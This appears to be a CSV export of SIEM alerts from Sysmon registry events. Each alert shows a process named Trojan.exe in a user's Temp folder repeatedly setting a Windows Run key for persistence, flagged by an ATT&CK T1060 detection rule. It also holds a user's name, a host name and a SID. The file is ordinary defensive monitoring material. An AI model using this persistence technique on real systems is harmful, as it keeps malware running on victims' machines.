HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:32.172865800Z"",""eventRecordID"":""1310"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:32.155\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:32.155"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:47.933",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:31.135 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:31.168379100Z"",""eventRecordID"":""1309"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:31.135\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:31.135"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:45.352",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:30.122 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:30.141135700Z"",""eventRecordID"":""1308"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:30.122\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:30.122"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:41.289",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:29.116 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:29.125066800Z"",""eventRecordID"":""1307"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:29.116\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:29.116"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:41.242",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:28.106 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:28.127479100Z"",""eventRecordID"":""1305"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:28.106\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:28.106"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:40.264",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:27.091 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:27.093669700Z"",""eventRecordID"":""1304"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:27.091\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:27.091"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:38.263",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:26.076 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:26.080985700Z"",""eventRecordID"":""1303"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:26.076\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:26.076"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:38.249",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:25.044 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:25.081166300Z"",""eventRecordID"":""1302"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:25.044\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:25.044"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:36.561",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:24.029 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:24.076048400Z"",""eventRecordID"":""1301"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:24.029\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:24.029"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:36.486",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:23.013 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:23.179641800Z"",""eventRecordID"":""1300"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:23.013\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:23.013"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:35.327",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:21.997 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:22.002470700Z"",""eventRecordID"":""1299"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:21.997\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:21.997"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:34.123",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:20.967 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 